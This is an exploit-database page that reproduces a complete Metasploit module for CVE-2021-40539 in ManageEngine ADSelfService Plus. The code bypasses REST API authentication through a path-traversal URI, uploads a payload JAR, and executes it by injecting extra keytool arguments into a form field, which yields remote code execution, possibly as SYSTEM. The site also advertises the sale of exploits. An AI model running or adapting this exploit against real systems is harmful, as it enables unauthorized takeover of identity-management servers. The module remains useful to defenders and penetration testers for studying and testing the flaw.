0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
ManageEngine ADSelfService Plus Authentication Bypass / Code Execution Exploit
Author
Risk
[Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Java::HTTP::ClassLoader # TODO: Refactor this
include Msf::Exploit::FileDropper
def initialize(info = {})
super(
update_info(
info,
'Name' => 'ManageEngine ADSelfService Plus CVE-2021-40539',
'Description' => %q{
This module exploits CVE-2021-40539, a REST API authentication bypass
vulnerability in ManageEngine ADSelfService Plus, to upload a JAR and
execute it as the user running ADSelfService Plus - which is SYSTEM if
started as a service.
},
'Author' => [
# Discovered by unknown threat actors
'Antoine Cervoise', # Independent analysis and RCE
'Wilfried Bécard', # Independent analysis and RCE
'mr_me', # keytool classloading technique
'wvu' # Initial analysis and module
],
'References' => [
['CVE', '2021-40539'],
['URL', 'https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html'],
['URL', 'https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis'],
['URL', 'https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html'],
['URL', 'https://github.com/synacktiv/CVE-2021-40539/blob/main/exploit.py']
],
'DisclosureDate' => '2021-09-07',
'License' => MSF_LICENSE,
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Privileged' => false, # true if ADSelfService Plus is run as a service
'Targets' => [
['Java Dropper', {}]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'RPORT' => 8888
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)
register_options([
OptString.new('TARGETURI', [true, 'Path traversal for auth bypass', '/./'])
])
end
def check
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'),
'vars_post' => {
'methodToCall' => 'previewMobLogo'
}
)
unless res
return CheckCode::Unknown('Target failed to respond to check.')
end
unless res.code == 200 && res.body.match?(%r{mobLogo.*/temp/tempMobPreview\.jpeg})
return CheckCode::Safe('Failed to bypass REST API authentication.')
end
CheckCode::Vulnerable('Successfully bypassed REST API authentication.')
end
def exploit
upload_payload_jar
execute_payload_jar
end
def upload_payload_jar
print_status("Uploading payload JAR: #{jar_filename}")
jar = payload.encoded_jar
jar.add_file("#{class_name}.class", constructor_class) # Hack, tbh
form = Rex::MIME::Message.new
form.add_part('unspecified', nil, nil, 'form-data; name="methodToCall"')
form.add_part('yas', nil, nil, 'form-data; name="Save"')
form.add_part('smartcard', nil, nil, 'form-data; name="form"')
form.add_part('Add', nil, nil, 'form-data; name="operation"')
form.add_part(jar.pack, 'application/java-archive', 'binary',
%(form-data; name="CERTIFICATE_PATH"; filename="#{jar_filename}"))
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'),
'ctype' => "multipart/form-data; boundary=#{form.bound}",
'data' => form.to_s
)
unless res&.code == 404
fail_with(Failure::NotVulnerable, 'Failed to upload payload JAR')
end
# C:\ManageEngine\ADSelfService Plus\bin (working directory)
register_file_for_cleanup(jar_filename)
print_good('Successfully uploaded payload JAR')
end
def execute_payload_jar
print_status('Executing payload JAR')
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/RestAPI/Connection'),
'vars_post' => {
'methodToCall' => 'openSSLTool',
'action' => 'generateCSR',
# https://docs.oracle.com/javase/8/docs/technotes/tools/unix/keytool.html
'VALIDITY' => "#{rand(1..365)} -providerclass #{class_name} -providerpath #{jar_filename}"
}
)
unless res&.code == 404
fail_with(Failure::PayloadFailed, 'Failed to execute payload JAR')
end
print_good('Successfully executed payload JAR')
end
def jar_filename
@jar_filename ||= "#{rand_text_alphanumeric(8..16)}.jar"
end
end
# 0day.today [2024-11-15] #